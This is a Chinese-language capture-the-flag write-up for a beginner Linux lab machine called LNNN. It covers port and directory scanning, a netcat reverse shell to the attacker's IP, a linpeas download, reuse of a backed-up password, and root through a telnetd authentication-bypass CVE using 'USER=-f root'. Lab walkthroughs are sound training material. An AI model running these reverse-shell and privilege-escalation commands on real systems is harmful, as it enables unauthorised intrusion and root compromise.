LNNN

靶机:LNNN
作者:群主
靶机ID: 663
系统:Linux
难度:Baby

信息搜集

192.168.43.156

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
┌──(root㉿Eecho)-[~]
└─# rustscan -a 192.168.43.156 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.43.156:22
Open 192.168.43.156:80
Open 192.168.43.156:9090
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.156
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-20 14:55 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:55
Completed NSE at 14:55, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:55
Completed NSE at 14:55, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:55
Completed NSE at 14:55, 0.00s elapsed
Initiating ARP Ping Scan at 14:55
Scanning 192.168.43.156 [1 port]
Completed ARP Ping Scan at 14:55, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:55
Completed Parallel DNS resolution of 1 host. at 14:55, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:55
Scanning 192.168.43.156 [3 ports]
Discovered open port 22/tcp on 192.168.43.156
Discovered open port 80/tcp on 192.168.43.156
Discovered open port 9090/tcp on 192.168.43.156
Completed SYN Stealth Scan at 14:55, 0.02s elapsed (3 total ports)
Initiating Service scan at 14:55
Scanning 3 services on 192.168.43.156
Completed Service scan at 14:56, 52.15s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.156
Retrying OS detection (try #2) against 192.168.43.156
NSE: Script scanning 192.168.43.156.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:56
NSE Timing: About 99.77% done; ETC: 14:57 (0:00:00 remaining)
Completed NSE at 14:57, 30.32s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:57
Completed NSE at 14:57, 1.21s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:57
Completed NSE at 14:57, 0.00s elapsed
Nmap scan report for 192.168.43.156
Host is up, received arp-response (0.00056s latency).
Scanned at 2026-05-20 14:55:47 CST for 87s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 10.0p2 Debian 7+deb13u1 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.66 ((Debian))
|_http-server-header: Apache/2.4.66 (Debian)
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Warning
9090/tcp open ssl/http syn-ack ttl 64 Cockpit web service 323 or later
| ssl-cert: Subject: commonName=LNNN/organizationName=c2d6d1b6c1084753b022ca80771b162d
| Subject Alternative Name: IP Address:127.0.0.1, DNS:localhost
| Issuer: commonName=LNNN/organizationName=c2d6d1b6c1084753b022ca80771b162d
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-05-16T12:12:36
| Not valid after: 2027-06-15T12:12:36
| MD5: e4c5 15c9 7c72 4e30 2fc5 7730 8fc6 fc80
| SHA-1: 35c1 53ed ca78 45d4 93ac e679 5b54 c601 f83d f387
| SHA-256: f7b9 8338 2622 23ad c057 c185 9dd0 227c 1acf 27eb a20b b395 a2e6 ee90 5842 a927
| -----BEGIN CERTIFICATE-----
| MIIDmDCCAoCgAwIBAgIUI9FC7bP/Gfoi6C2B6S+9pZTVDJwwDQYJKoZIhvcNAQEL
| BQAwOjEpMCcGA1UECgwgYzJkNmQxYjZjMTA4NDc1M2IwMjJjYTgwNzcxYjE2MmQx
| DTALBgNVBAMMBExOTk4wHhcNMjYwNTE2MTIxMjM2WhcNMjcwNjE1MTIxMjM2WjA6
| MSkwJwYDVQQKDCBjMmQ2ZDFiNmMxMDg0NzUzYjAyMmNhODA3NzFiMTYyZDENMAsG
| A1UEAwwETE5OTjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMH+BONl
| Y/guez5+WHp26VHDyL8minC39Uv3w5iOpUMmTlDFK7uF7JofsUF1XgOBu0ERkgXk
| /aKs6vpe2zrSLXed+XkOyiv7VjffmJqp5gHSLUzlH9h5DX+50KQ7+HTJSti0JB5U
| fgnuArOGGOa77taHGAOvAjzxNluKUGRpj4TJS3ZKrv2WqzN9k9vzYN2NGumUTj8X
| I4QqfZ81kOpVateC4MZe5dZB1A5PA+zl58oxEZYISiJP36AWBBsVW3O+SUOaIZAH
| 2V4LP55v57vOJNoLJPBySbpB18I6mV+7yOPYfOQBGxXnbToZyK+O1X/QKbjAGVG7
| QrJsmGAnUEryicMCAwEAAaOBlTCBkjAdBgNVHQ4EFgQU5QaMxFxcf24TavmqQYG6
| rqk7NoMwHwYDVR0jBBgwFoAU5QaMxFxcf24TavmqQYG6rqk7NoMwGgYDVR0RBBMw
| EYcEfwAAAYIJbG9jYWxob3N0MA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQD
| AgGuMBMGA1UdJQQMMAoGCCsGAQUFBwMBMA0GCSqGSIb3DQEBCwUAA4IBAQCRMdGU
| v3md6ZO5G3o/K+j/hgq/23lQ1PfLEBiYDXmoPYdpw6uR0PICzZUKdAotXyyTBNgC
| 0m/e8bWJlT4sz1c/8Xi3CgJEggy16pFa/oaIT/oWCA78NYVVbJ/BgS6mKA8enrWc
| m+qeRkNzQRHo9swFWqWjZ7h2d8hDhFqlP8m4dFt7PjClvQS5uZbTHizJueA+Z76t
| 9eSb0lrDNABhZcBiZbBVYUdfuRXzwpnMFWoac5xCmLtRbARToCQd2JPImUcpUqm2
| 6croSyg65GRQ3pMGSQicILX9nMAy0T97i/Fhzuy3smWekIJ2RnXFSnOt+S96JKf4
| IPkACdS2Y//ubTCA
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Loading...
| http-robots.txt: 1 disallowed entry
|_/
|_http-favicon: Unknown favicon MD5: 46E6AB653E747CB83F60FC5CF29155C8
MAC Address: 08:00:27:24:2A:34 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Android 5 - 10 (Linux 3.4 - 3.18) (93%), Linux 2.6.32 (93%), Google Chromecast or Roku TV (Linux 4.9) (93%), Android 10 - 12 (Linux 4.14 - 4.19) (93%), Linux 5.10 - 5.19 (93%), Nintendo Switch (93%), Linux 3.2 - 4.14 (93%), Linux 5.4 - 5.10 (93%), OpenWrt 21.02 (Linux 5.4) (93%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.99%E=4%D=5/20%OT=22%CT=%CU=37346%PV=Y%DS=1%DC=D%G=N%M=080027%TM=6A0D5B4A%P=x86_64-pc-linux-gnu)
SEQ(SP=104%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=21)
SEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=Z%TS=21)
OPS(O1=M5B4ST11NW8%O2=M5B4ST11NW8%O3=M5B4NNT11NW8%O4=M5B4ST11NW8%O5=M5B4ST11NW8%O6=M5B4ST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW8%CC=Y%Q=)
T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.000 days (since Wed May 20 14:56:40 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.56 ms 192.168.43.156

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:57
Completed NSE at 14:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:57
Completed NSE at 14:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:57
Completed NSE at 14:57, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.88 seconds
Raw packets sent: 48 (3.716KB) | Rcvd: 32 (2.660KB)
  • 22 SSH
  • 80 HTTP
  • 9090 HTTP

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿Eecho)-[~]
└─# gobuster dir -u http://192.168.43.156/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,back,cgi,jpg,json,md
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.43.156/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: txt,html,back,cgi,jpg,json,md,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html (Status: 200) [Size: 849]
tools (Status: 301) [Size: 356] [--> http://192.168.43.156/tools/]

/tools/下有个shell.php可以进行rce

image

反弹shell

1
busybox nc 192.168.43.6 7777 -e sh

image

提权

www -> lnnn

上传linpeas扫描信息

1
2
3
4
5
6
7
8
9
10
11
12
13
www-data@LNNN:/tmp$ wget http://192.168.43.6/linpeas.sh.1
--2026-05-20 03:01:24-- http://192.168.43.6/linpeas.sh.1
Connecting to 192.168.43.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1062554 (1.0M) [application/x-sh]
Saving to: ‘linpeas.sh.1’

linpeas.sh.1 100%[=================================================>] 1.01M 2.77MB/s in 0.4s

2026-05-20 03:01:24 (2.77 MB/s) - ‘linpeas.sh.1’ saved [1062554/1062554]

www-data@LNNN:/tmp$ chmod +x linpeas.sh.1
www-data@LNNN:/tmp$ ./linpeas.sh.1

image

可以看到一个备份文件夹

image

有个lnnn用户的密码文件,查看一下

image

成功获取到lnnn用户的凭证

横向移动到lnnn用户

1
2
3
4
5
www-data@LNNN:/var/backups$ su lnnn
Password:
lnnn@LNNN:/var/backups$ id
uid=1000(lnnn) gid=1000(lnnn) groups=1000(lnnn),100(users)
lnnn@LNNN:/var/backups$

lnnn -> root

查看当前运行的进程

1
2
ps aux
ss -utnl

发现了一个socat在本地 23 端口创建一个仅限本机访问的 Telnet 服务器

image

同时还有一个23端口的telnet在监听

image

查看telnet服务器版本发现是2.4的

image

GNU Inetutils 1.9.3 - 2.7之间是有个CVE-2026-24061认证绕过漏洞的。可通过环境变量注入实现无需认证的root权限获取,所以可以使用这个CVE提权,因为可以看到是root运行的

1
4 S root         509       1  0  60   0 -  2930 -      02:53 ?        00:00:00 /usr/bin/socat TCP-LISTEN:23,bind=127.0.0.1,fork,reuseaddr EXEC:/usr/bin/telnetd,nofork

https://github.com/MY0723/GNU-Inetutils-telnet-CVE-2026-24061-

image

1
2
3
4
5
6
7
8
9
10
lnnn@LNNN:/tmp/GNU-Inetutils-telnet-CVE-2026-24061-$ USER='-f root' telnet -a 127.0.0.1
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.

Linux 7.0.8-1-liquorix-amd64 (LNNN) (pts/1)

root@LNNN:~# id
uid=0(root) gid=0(root) groups=0(root)
root@LNNN:~#

这台靶机并不需要按照常规的拿普通用户然后再到root。从www提权到root也是可行的

1
2
3
4
5
6
7
8
9
10
www-data@LNNN:/tmp/GNU-Inetutils-telnet-CVE-2026-24061-$ USER='-f root' telnet -a 127.0.0.1
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.

Linux 7.0.8-1-liquorix-amd64 (LNNN) (pts/1)

root@LNNN:~# id
uid=0(root) gid=0(root) groups=0(root)
root@LNNN:~#